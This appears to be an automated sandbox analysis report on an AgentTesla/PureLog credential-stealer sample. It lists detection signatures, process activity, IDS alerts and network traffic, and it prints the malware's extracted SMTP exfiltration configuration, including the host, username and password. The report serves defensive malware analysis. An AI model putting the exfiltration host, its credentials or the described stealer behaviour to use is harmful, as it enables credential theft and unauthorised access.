Windows Analysis Report
Copy#51007602.exe

Overview

General Information

Sample name: Copy#51007602.exe
Analysis ID: 1448039
MD5: d503277ebd054e3a3ccfe906cac2e6d8
SHA1: f209eb92df97e2569897f5da1097ae0d5b8d4bdb
SHA256: 7c9fb1f9b7c24c9e0608af47b246b224e295ebc18aecfee6a104a7046d9db19a
Tags: AgentTesla, exe

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Drops large PE files
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Copy#51007602.exe (PID: 6008 cmdline: "C:\Users\user\Desktop\Copy#51007602.exe" MD5: D503277EBD054E3A3CCFE906CAC2E6D8)
    • Copy#51007602.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\Copy#51007602.exe" MD5: D503277EBD054E3A3CCFE906CAC2E6D8)
  • itdtn.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\itdtn.exe" MD5: C62B7992DB97A6341DACBE7E3D936C74)
    • itdtn.exe (PID: 3936 cmdline: "C:\Users\user\AppData\Roaming\itdtn.exe" MD5: C62B7992DB97A6341DACBE7E3D936C74)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "jahnindustry.shop", "Username": "sendanell@jahnindustry.shop", "Password": "WmfkJ55yPdtj"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

Source | Rule | Description | Author | Strings
4.2.itdtn.exe.4cce790.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
4.2.itdtn.exe.4ca6770.15.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Copy#51007602.exe.45de7d0.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
4.2.itdtn.exe.4d1e7b0.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
4.2.itdtn.exe.4dbe7d0.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security

                        System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\itdtn.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Copy#51007602.exe, ProcessId: 6008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\itdtn
Source: Network Connection, Author: frack113, Data: DestinationIp: 66.29.151.236, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Copy#51007602.exe, Initiated: true, ProcessId: 4084, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Timestamp: 05/27/24-15:15:09.558181, SID: 2851779, Source Port: 49705, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:21.815023, SID: 2855542, Source Port: 49715, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:21.815023, SID: 2855245, Source Port: 49715, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:21.815023, SID: 2840032, Source Port: 49715, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:21.815023, SID: 2851779, Source Port: 49715, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:09.558181, SID: 2855542, Source Port: 49705, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:09.558181, SID: 2855245, Source Port: 49705, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:09.558181, SID: 2840032, Source Port: 49705, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:21.814973, SID: 2030171, Source Port: 49715, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/27/24-15:15:09.558132, SID: 2030171, Source Port: 49705, Destination Port: 587, Protocol: TCP, Classtype: A Network Trojan was detected

                        AV Detection

Source: C:\Users\user\AppData\Roaming\itdtn.exe, Avira: detection malicious, Label: HEUR/AGEN.1332199
Source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "jahnindustry.shop", "Username": "sendanell@jahnindustry.shop", "Password": "WmfkJ55yPdtj"}
Source: Copy#51007602.exe, Virustotal: Detection: 28%
Source: Copy#51007602.exe, ReversingLabs: Detection: 15%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\AppData\Roaming\itdtn.exe, Joe Sandbox ML: detected
Source: Copy#51007602.exe, Joe Sandbox ML: detected
Source: Copy#51007602.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: Copy#51007602.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2126157017.0000000005510000.00000004.08000000.00040000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004F89000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0548D9B8
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05508112
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_05508118
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_055080D2
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h4_2_05D2D9B8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_05E17BF3
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_05E17BF8

                        Networking

Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49705 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49705 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49705 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49705 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49715 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49715 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49715 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49715 -> 66.29.151.236:587
Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49715 -> 66.29.151.236:587
Source: Yara match, File source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
Source: global traffic, TCP traffic: 192.168.2.5:49705 -> 66.29.151.236:587
Source: Joe Sandbox View, IP Address: 66.29.151.236
Source: Joe Sandbox View, IP Address: 104.26.13.205
Source: Joe Sandbox View, ASN Name: ADVANTAGECOMUS
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: jahnindustry.shop
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jahnindustry.shop
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.000000000357C000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: Copy#51007602.exe, 00000002.00000002.3235618888.0000000003291000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000005.00000002.3236815937.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, itdtn.exe, 00000004.00000002.2229535791.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2114770908.00000000046BE000.00000004.00000800.00020000.00000000.sdmp, Copy#51007602.exe, 00000000.00000002.2123138110.0000000004F30000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown, Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49714 version: TLS 1.2

                        System Summary

Source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers, Author: ditekSHen
Source: C:\Users\user\Desktop\Copy#51007602.exe, File dump: itdtn.exe.0.dr 293997803
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE00402_2_06FE0040
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE5D082_2_06FE5D08
                        Source: C:\Users\user\Desktop\Copy#51007602.exeCode function: 2_2_06FE00072_2_06FE0007
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6B1A74_2_02F6B1A7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6C5C44_2_02F6C5C4
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F68AF04_2_02F68AF0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F66C6C4_2_02F66C6C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F650C84_2_02F650C8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F650B84_2_02F650B8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F626BA4_2_02F626BA
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F68ADF4_2_02F68ADF
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F688384_2_02F68838
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F6880F4_2_02F6880F
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_02F65ED74_2_02F65ED7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B018474_2_05B01847
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B02E584_2_05B02E58
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B01B774_2_05B01B77
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B26E584_2_05B26E58
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B27B314_2_05B27B31
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B263384_2_05B26338
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B26E484_2_05B26E48
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B200064_2_05B20006
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B280774_2_05B28077
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B2705C4_2_05B2705C
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B200404_2_05B20040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B263284_2_05B26328
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B21AA04_2_05B21AA0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05B21A904_2_05B21A90
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D1E7804_2_05D1E780
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D11BF84_2_05D11BF8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D2F1084_2_05D2F108
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D200404_2_05D20040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05D2001D4_2_05D2001D
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05E186884_2_05E18688
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05E186984_2_05E18698
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FCC8584_2_05FCC858
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FB00404_2_05FB0040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 4_2_05FB00064_2_05FB0006
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01ACE6395_2_01ACE639
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC4A985_2_01AC4A98
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01ACAA225_2_01ACAA22
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC3E805_2_01AC3E80
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_01AC41C85_2_01AC41C8
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FEA1785_2_06FEA178
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF66005_2_06FF6600
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF55B05_2_06FF55B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFB23F5_2_06FFB23F
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF30705_2_06FF3070
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFC1905_2_06FFC190
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF7D905_2_06FF7D90
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF76B05_2_06FF76B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FFE3B05_2_06FFE3B0
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF23785_2_06FF2378
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00405_2_06FF0040
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF5CF75_2_06FF5CF7
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00375_2_06FF0037
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FF00175_2_06FF0017
                        Source: Copy#51007602.exe, Static PE information: invalid certificate
                        Source: Copy#51007602.exe, 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameRamobntk.dll" vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2114770908.00000000045F2000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2108786993.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclrjit.dllT vs Copy#51007602.exe
                        Source: Copy#51007602.exe, 00000000.00000002.2111351064.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs Copy#51007602.exe
